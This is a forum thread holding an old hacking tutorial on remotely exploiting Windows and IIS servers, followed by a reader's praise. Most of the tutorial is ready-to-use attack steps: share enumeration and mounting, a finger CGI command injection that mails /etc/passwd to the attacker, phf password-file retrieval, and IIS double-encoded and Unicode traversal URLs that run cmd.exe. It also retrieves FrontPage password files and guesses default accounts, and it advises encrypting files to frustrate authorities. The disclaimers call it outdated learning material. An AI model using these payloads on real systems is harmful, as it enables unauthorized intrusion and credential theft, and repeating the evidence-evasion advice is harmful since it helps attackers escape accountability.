Results 1 to 2 of 2

Thread: MS Exploits

  1. #1

    MS Exploits

    This thing I wrote I while back.
    It has been posted on hackergurus.tk.
    It will discuss some things about exploiting a windows box remotely.
    Note that I found all this information on the internet.

    To get a good understanding I rewrote the info.
    This post contains attacking techniques but ttbofk are all oudated.
    The are meant as to use as a learning tool.

    Note: I have not disovered any of the bugs mentioned.

    Exploits for newbees by noODle.

    Most of these exploits don't work anymore cuz they have been patched. I wanted to give some info on how exploits work, not give away any nor induce people to perform illegal actions. If you are experienced with hacking this file is probably not of much interrest to you.
    Well let's rumble.

    This first exploit is known as FPS exploit.
    It works with the File and Printer sharing services built in to Windows. It is not active by default but people with small office and home networks use this service to........share files and printers. To find out if a target is using this service you use 'nbtstat -A IP.ADRS.GOES.HERE.'.
    You will get a listing (or an error message).
    Like this:
    Name Type Status
    -----------------------------------------------------------------------------
    <computername> <20> UNIQUE Registered
    <computername> <00> GROUP Registered
    <computername> <03> UNIQUE Registered
    <computername> <2B> UNIQUE Registered
    (can be longer)
    If you get the error message the services are not enabled. Try checking if they are enabled on your computer. In network setting go to 'TCP/IP->properties->Netbios' and check the box.
    If the host has 20 (hex between the<>) as value the FPS services are running. You could exploit this through DOS by giving the command: 'net view \\IP.ADRESS.GOES.HERE'. This will give you a listing of what is shared on the computer. If the list is long append to a textfile (>>c:\text\textfile.txt).
    Now use the command: 'net use G: \\IP.ADRESS.GOES.HERE\sharename'. This will create a virtual drive on your box named G: (assuming the G is unused). You can browse this using DOS. Don't forget clear the drive when you are done. If you are experienced with Windows you could create an entry in you LMHOSTS file and browse the computer GUI style. Remember that you created a virtual drive and programs will be executed locally. Use net /? to learn all the functions. The file sharing services use the following ports: 135-139 and for Win2000: 445.
    Set up your own lab, experiment with friends have fun but do not break the law. You can and will be caught.

    The second one is also an oldy. Worth mentioning though.
    You use a simple webbrowser to get a password file.
    If you know the owners email address (look on the page) you could try this:
    'http://www.TARGET_GOES_HERE.net/cgi-bin/finger'
    If it works you will see a box. Type this there.
    'victim@server.net ; /bin/mail YOURMAIL@THERE.NET <etc/passwd'
    This will copy victim's passwordfile to your mailbox.
    Not getting the box?
    Try the phf technique. To find out if it is enabled type 'http://www.TARGET_GOES_HERE.net/cgi-bin/phf' in your browser. If it is enabled you will get some pop ups. Ignore these.
    Now in the browsers location field type:
    'http://www.TARGET_GOES_HERE.net/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd'
    If this works you'll get the password file displayed in your browser. Copy and use your password cracker. After this some commen sense comes in handy.
    Read the URL and see if you can find out what any of this means.To put something to a website you can try: http://www.TARGET_GOES_HERE.net/cgi-...0a/bin/echo%20"text to be added goes here."%20>>filename.htm

    A lame trick to play on you friend using a Win95 box. When he takes a leak, get behind his box and use Ctrl-Esc to pop up the startmenu. Esc again. The start button should by now have a dotted square on it. Use Alt-- (that's the alternate button and a minus character) to pop up another menu. This will enable you to close(!) the startbutton. A reboot will be required to get it back on top.

    The next one will be a bit longer.(IIS)
    To get the best out of this will have to have some understanding of how a NT server is setup. Basicly it comes down to this:
    'C:\Inetpub\wwwroot\PAGEHERE.HTM'
    will look like
    "http://www.SERVER.net/PAGEHERE.HTM'.
    Since the server offers services for executing progs (ie: cgi) it's has a vulnarability.
    The folders in Inetpub serve these purposes. For example /scripts.
    You could try by typing in your browser http://www.SERVER.net/scripts/..\..\ to get to the root drive. Hmmm.
    This don't work offcourse.
    IIS has built in security that checks for malicious requests.
    So you use hex.
    Get an ascii chart and look for the \.
    To give hex to IIS use the percentage symbol like this %5C. Your browsers show you these too sometimes.
    Since IIS double checks you will have to code it twice.
    %25 will give you the percentage symbol
    %35 will give you the 5
    %43 will give you the C

    So the exploit looks like this:
    'http://www.SERVER.net/scripts/..%25%35%43..%25%35%43'.
    By now you have defeated security. To make this thing usefull you will have to give some more parameters.
    First of all you'll have to navigate to the prog (say cmd). Then you will have to add the command you want it to execute.
    This is how you list the files of the root directory.
    'http://www.SERVER.net/scripts/..%25%35%43..%25%35%43winnt/system32/cmd.exe?/c+dir+c:\'
    Other DOS commands are also applicable.
    'http://www.SERVER.net/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\'
    will give you the same result from a different point of view.
    Look at the way IIS is setup and try typing in URL's in your browser like this:
    'http://www.SERVER.net/folderhere/no_file.asp'. If it responds with 404 FnF the services are enabled. If it gives you 403 Forbidden they are not.
    If for example frontpage extensions are enabled on the server it is likely to contain the following folders.
    C:\InetPub\wwwroot\_vti_bin
    C:\InetPub\wwwroot\_vti_bin\_vti_adm
    C:\InetPub\wwwroot\_vti_bin\_vti_aut
    amounghst others. You can also use telnet to perform these things. It is usually faster since you have to type in the URL's anyway. Plus it gives you better control.
    To check if the extensions are installed telnet to the server on port 80 or 443 and perform the get technique. 'GET /_vti_inf.html'. (type in the full URL followed bu two CR's)
    Next try 'GET /_vti_pvt/administrators.pwd' (or authors.pwd). If it works you'll get the password files which will give you some access permissions.
    With your browser you can perform a trick called directory surfing. This is surfing for files that don't exist. Surf to 'http://www.server.net/dirgoeshere/filedoesnotexist.dll'.
    If it gives you a 404 file not found error the service is not enabled. If on the other hand it gives you a 500 Internal server error the services might be enabled after all. Try:
    'PUT http://www.server.net/dirgoeshere/myfile.txt'. If it works you will get a http continue msg.
    Type 10 A's and press enter.
    Now either a Created or a Access denied msg is created. If the second is the case you unlucky today.
    To check for vulnarabilities you could also try the following:
    /***noODle © "Hmmm...
    /***noODLe © "Light another...
    Telnet to the server on the FTP port, log in as anonymous using an imail adress. Use standard FTP commands to get information you are looking for.
    Telnet to ports 25 & 110 to get the imail services running, the error msg's are very usefull.
    Try some default account names like guest and guess passwords.



    Props go to:
    rhino9
    Blacksun Research Facility.
    Astalavista.
    Antionline.
    The Underground World.
    The Advanced Knowledge Network.
    Ofcourse to the hackergurus.
    To everybody I forgot.

    For a good understanding learn several things like Perl, C and CGI programming. Set up your own (unpatched) NT IIS server network and try hacking this. This will give you a good way to study the exploits plus it won't get you caught. Encrypt your own files. This will get you started in the world of cryptologie and will make it harder for authorities to gain evidence. Microsoft's implementation of the Point to Point Tunneling Protocol (used for Virtual Private Networking) has been stamped as a bad implemantation of a pretty secure protocol.


    That's it, my tutorial on weaknesses in MS OS. I hope you enjoyed it.

    noODle

  2. #2
    Senior Member
    Join Date
    Feb 2003
    Posts
    211
    Yess .. i realized that NoOdle.
    But i have my own principle .. i will do what i should do and my decision is my decision, i put Nix and M$ on my network for balance, some ppl not familiar with nix or other and they are so familiar with M$.. thats the fact .. nice tutorial , hhmm no it is woderfull tutorial.

    When I lay me down to sleep, Pray the LORD my soul to keep.
    If I die before i wake, Pray the LORD my soul to take.

    http://www.AntiOnline.com/sig.php?imageid=389

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •